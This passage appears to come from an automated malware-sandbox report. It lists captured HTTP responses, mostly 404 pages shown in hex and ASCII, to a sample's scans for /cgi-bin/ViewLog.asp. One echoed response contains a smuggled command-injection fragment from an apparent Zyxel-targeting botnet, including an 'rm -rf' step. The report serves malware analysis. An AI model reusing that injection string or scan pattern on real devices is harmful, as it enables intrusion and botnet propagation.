72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 12:55:51 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:57:38 GMTServer: Apache/2Content-Length: 315Keep-Alive: timeout=2, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:57:37 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://as-automation.at/wp-json/>; rel="https://api.w.org/"Upgrade: h2cConnection: Upgrade, Keep-AliveKeep-Alive: timeout=15, max=100Transfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 30 30 39 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 3c 74 69 74 6c 65 3e 53 65 69 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 26 23 38 32 31 31 3b 20 41 53 20 41 75 74 6f 6d 61 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 61 73 2d 61 75 74 6f 6d 61 74 69 6f 6e 2e 61 74 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 53 20 41 75 74 6f 6d 61 74 69 6f 6e 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 73 2d 61 75 74 6f 6d 61 74 69 6f 6e 2e 61 74 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 53 4b 59 50 45 5f 54 4f 4f 4c 42 41 52 22 20 63 6f 6e 74 65 6e 74 3d 22 53 4b 59 50 45 5f 54 4f 4f 4c 42 41 52 5f 50 41 52 53 45 52 5f 43 4f 4d 50 41 54 49 42 4c 45 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 66 35 66 35 66 35 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 69 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 26 23 38 32 31 31 3b 20 41 53 20 41 75 74 6f 6d 61 74 69 6f 6e 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 3a 2f 2f 61 73 2d 61 75 74 6f 6d 61 74 69 6f 6e 2e 61 74 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 5f 44 45 22 3e 0a 3c 6d 65 74 61 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenTransfer-Encoding: chunkedServer: Microsoft-HTTPAPI/2.0Date: Sun, 23 Oct 2022 15:57:47 GMTData Raw: 30 0d 0a 0d 0a Data Ascii: 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sun, 23 Oct 2022 15:57:38 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipData Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7b(HML),I310Q/Qp/K&T$dCAfAyyyzzIy%jaC]7X0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:57:38 GMTServer: Apache/2.4.6 (CentOS) PHP/7.2.34Content-Length: 217Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 0Date: Sun, 23 Oct 2022 15:57:47 GMTX-Frame-Options: sameoriginContent-Security-Policy: frame-ancestors 'self'X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=block
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 16:57:30 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Sun, 23 Oct 2022 15:57:39 GMTserver: LiteSpeedData Raw: 31 33 33 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a db 72 a3 ca 7a be 5f 4f 41 9c 4a b2 77 31 1e ce 02 bc ed 49 00 21 40 12 08 90 90 84 52 a9 55 08 9a 83 38 8a b3 94 ca 03 e5 35 f2 64 29 64 7b 2c cb f6 9a 95 54 2e d2 37 88 fe bb bf ff fc 77 ab 9b df 7e fb ed f1 ef c6 0b 61 65 eb 22 14 d6 69 f2 e3 b7 c7 e7 07 04 41 d0 63 08 1c ef c7 6f 97 9f 29 a8 1d 28 ac eb e2 1e 1c 9b a8 7d ba 13 f2 ac 06 59 7d 5f 9f 0a 70 07 b9 cf 6f 4f 77 35 e8 6b 64 80 f8 1b e4 86 4e 59 81 fa a9 a9 fd 7b e6 ee 4b 1c c7 0d c1 fd 30 bf cc 93 2b a0 2c bf 77 07 d2 97 13 f5 d2 09 52 e7 7f 32 43 ec 8b a8 04 d5 d5 14 f4 1d 7a e6 a4 e0 e9 ae 8d 40 57 e4 65 7d 35 ac 8b bc 3a 7c f2 40 1b b9 e0 fe f2 f2 0d 8a b2 a8 8e 9c e4 be 72 9d 04 3c 61 df 7f 42 d5 51 9d 80 1f 24 4a 42 5a 5e 43 93 bc c9 bc 47 e4 b9 f3 d9 94 55 7d 4a 00 34 d8 ed c5 5c 6e 55 bd c8 31 98 7a 9f 7b 27 e8 df 2f 43 87 d7 a1 f9 79 56 df fb 4e 1a 25 a7 07 88 2b 23 27 f9 06 c9 20 69 41 1d b9 ce 37 a8 72 b2 ea be 02 65 e4 ff ed e3 b4 2a 3a 83 07 08 23 8b fe 3d 31 89 32 70 1f 82 28 08 eb 07 08 fb 4e e2 0c 45 63 24 ce be 1f b5 77 dc 38 28 07 1d ee dd 3c c9 cb 07 e8 ef fd 4b 7b 3f ec 95 86 4f 08 9c 40 df d3 0a c7 f3 a2 2c 78 80 6e fa 53 a7 0c a2 ec 5d f7 7f fc 14 bf 02 6e 1d e5 d9 37 c8 cf f3 1a 94 37 f6 f0 a2 aa 48 9c d3 03 b4 4f 72 37 fe 3f 60 f7 7d 88 3f 27 ca 3e 70 7a 16 f2 3e 01 7e fd 00 39 4d 9d bf 67 f6 42 2e 9f ad f8 91 fe a6 3b 84 a1 d7 1e 78 d3 f4 7b 09 aa 22 cf 2a 70 1f 65 7e 7e a3 e8 ab 5d 85 4b 7b e3 7d 35 bd aa 9d ba a9 ee dd dc 03 37 93 2f 51 f3 ec 7e 0a 45 ff e1 8f 66 97 c0 a9 f2 ec eb f9 38 75 3d 7f 08 c9 af 5c 70 25 d9 c5 a6 6e 7d d1 eb db 4f cf 7e 7f e6 75 3f 14 8a 1b 86 af da a2 97 f6 a9 bc 43 2c 0d 81 e1 24 9f 99 eb 2a 5a 4b 50 00 a7 7e 80 b2 fc fe f9 e7 1b dc 20 fe d5 c8 57 ae 38 4b 70 24 f7 7e d8 2b 6d 72 69 6f b4 2b 2d 6f 25 72 be 50 ea cf 43 dc 47 35 48 ab 1b 98 9f 91 84 a3 45 ff 21 95 a2 ec 2d 95 59 e2 8b 40 bb f6 c7 0d fa 4b 1c ef f3 ba ce d3 07 68 e0 f1 a6 ec cf 0a f4 52 4a 46 d7 c4 2b 4b bc c3 bf 35 c3 e0 ee 7b 0f b8 79 e9 0c fe 7b 80 9a cc 03 e5 50 84 de 33 7a b5 38 89 33 bc 70 e5 8d 2f f9 3c 84 79 0b ca ab f8 7a 2f c6 83 9f bb 4d f5 35 d9 71 eb a8 bd cd 9c 57 21 70 6e 44 b2 a3 37 01 af 84 f8 3a 8a 5f eb da 67 8e ba 4a 49 ec 0b 33 36 c9 8d 6f 7e 66 5a 94 5d 6a f6 27 35 2f 89 aa fa fe b2 ac 0c 01 9f 01 28 6f ea 2a f2 c0 e5 e5 4d fc c1 91 af d2 dd 14 e3 9f e1 75 d5 ff a6 6d 93 40 49 74 23 96 9f e4 43 7e 0d 95 f1 3d 87 8b a7 9d 24 0a b2 07 c8 05 59 0d ca 37 fa 1b e4 f7 9b bc 79 09 fa cf 38 5d 16 dc 07 08 fb aa 86 0d 75 f3 3e 4a 9d e0 d6 8d 3f 95 fa b2 f6 5e a6 0e bb 9c 28 0b 6e f5 1b d6 dc ee 65 7d dc e7 89 f7 a6 c5 60 c7 6b 2d 3f da a0 cb 4b ef 7e 5f 02 27 7e 80 2e 8f 7b 27 49 de 03 fc 29 ad 2a 50 b6 a0 84 1c cf 2b 41 75 5b 12 be 16 e1 cd cc 9f 2e 9f d7 13
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 23 Oct 2022 15:57:40 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:57:40 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 276Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 31 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 68 31 3e 0a 3c 70 3e 73 63 61 72 69 73 2e 61 72 6d 37 2b 7a 79 78 65 6c 2e 73 65 6c 66 72 65 70 3b 72 6d 2b 2d 72 66 2b 61 73 63 61 72 69 73 2e 61 72 6d 37 25 33 62 25 32 33 26 61 6d 70 3b 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 20 74 6f 20 2f 69 6e 64 65 78 2e 68 74 6d 6c 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 73 6d 6f 6f 74 68 77 61 6c 6c 2e 6d 61 64 65 72 61 63 6f 65 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p><hr><address>Apache Server at 127.0.0.1 Port 80</address></body></html><!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>501 Not Implemented</title></head><body><h1>Not Implemented</h1><p>scaris.arm7+zyxel.selfrep;rm+-rf+ascaris.arm7%3b%23&amp;remoteSubmit=Save to /index.html not supported.<br /></p><hr><address>Apache Server at smoothwall.maderacoe.org Port 80</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.2Date: Sun, 23 Oct 2022 15:57:41 GMTContent-Type: text/htmlContent-Length: 169Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.2</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 0Date: Sun, 23 Oct 2022 16:06:49 GMTX-Frame-Options: sameoriginContent-Security-Policy: frame-ancestors 'self'
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.8.0Date: Sun, 23 Oct 2022 15:57:41 GMTContent-Type: text/htmlContent-Length: 168Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.8.0</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8Content-Length: 9Date: Sun, 23 Oct 2022 15:57:43 GMTConnection: keep-aliveKeep-Alive: timeout=5Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: AvigilonOnvifNvt/4.4.0.48Date: Sun, 23 Oct 2022 16:42:04 GMTExpires: Thu, 01 Jan 1970 00:00:00 GMTPragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8Content-Length: 154Strict-Transport-Security: max-age=16000000; includeSubDomains; preload;Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 48 31 3e 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6c 6f 67 69 6e 20 61 74 74 65 6d 70 74 73 20 65 78 63 65 65 64 65 64 2e 20 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e Data Ascii: <HTML><HEAD><TITLE>403 Forbidden</TITLE></HEAD><BODY><H1>403 Forbidden</H1>Maximum number of login attempts exceeded. Please try again later</BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 23 Oct 2022 15:57:44 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 17:02:20 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
